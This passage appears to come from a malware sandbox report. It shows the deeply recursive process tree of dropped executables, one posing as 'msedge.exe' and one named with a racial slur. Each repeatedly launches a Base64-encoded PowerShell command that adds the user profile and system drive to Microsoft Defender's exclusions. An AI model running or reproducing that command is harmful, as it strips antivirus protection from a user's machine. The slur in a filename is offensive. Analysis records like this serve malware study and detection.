C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"9⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"10⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="11⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"11⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="12⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"12⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="13⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"13⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="14⤵PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"14⤵PID:232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="15⤵PID:3396
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"15⤵PID:4324
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"15⤵PID:4240
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="16⤵PID:2664
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵PID:4988
-
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"16⤵PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"16⤵PID:2464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="17⤵PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"17⤵PID:3208
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"17⤵PID:5124
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="18⤵PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"18⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"18⤵PID:5424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="19⤵PID:5688
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"19⤵PID:5696
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"19⤵PID:5728
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="20⤵PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"20⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"20⤵PID:6008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="21⤵PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"21⤵PID:5176
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"21⤵PID:5184
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="22⤵PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"22⤵PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"22⤵PID:440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="23⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"23⤵PID:5924
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"23⤵PID:5948
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="24⤵PID:5316
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"24⤵PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"24⤵PID:3704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="25⤵PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"25⤵PID:5836
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"25⤵PID:5772
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="26⤵PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"26⤵PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"26⤵PID:3044
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="27⤵PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"27⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"27⤵PID:4768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="28⤵PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"28⤵PID:5180
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"28⤵PID:700
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="29⤵PID:6256
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"29⤵PID:6336
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"29⤵PID:6368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="30⤵PID:6560
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"30⤵PID:6580
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"30⤵PID:6604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="31⤵PID:6820
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"31⤵PID:6828
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"31⤵PID:6868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="32⤵PID:7064
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"32⤵PID:7092
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"32⤵PID:7108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="33⤵PID:6288
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"33⤵PID:6308
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"33⤵PID:6160
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="34⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"34⤵PID:6792
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"34⤵PID:6688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="35⤵PID:6552
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"35⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"35⤵PID:6024
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="36⤵PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"36⤵PID:3692
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"36⤵PID:6368
-
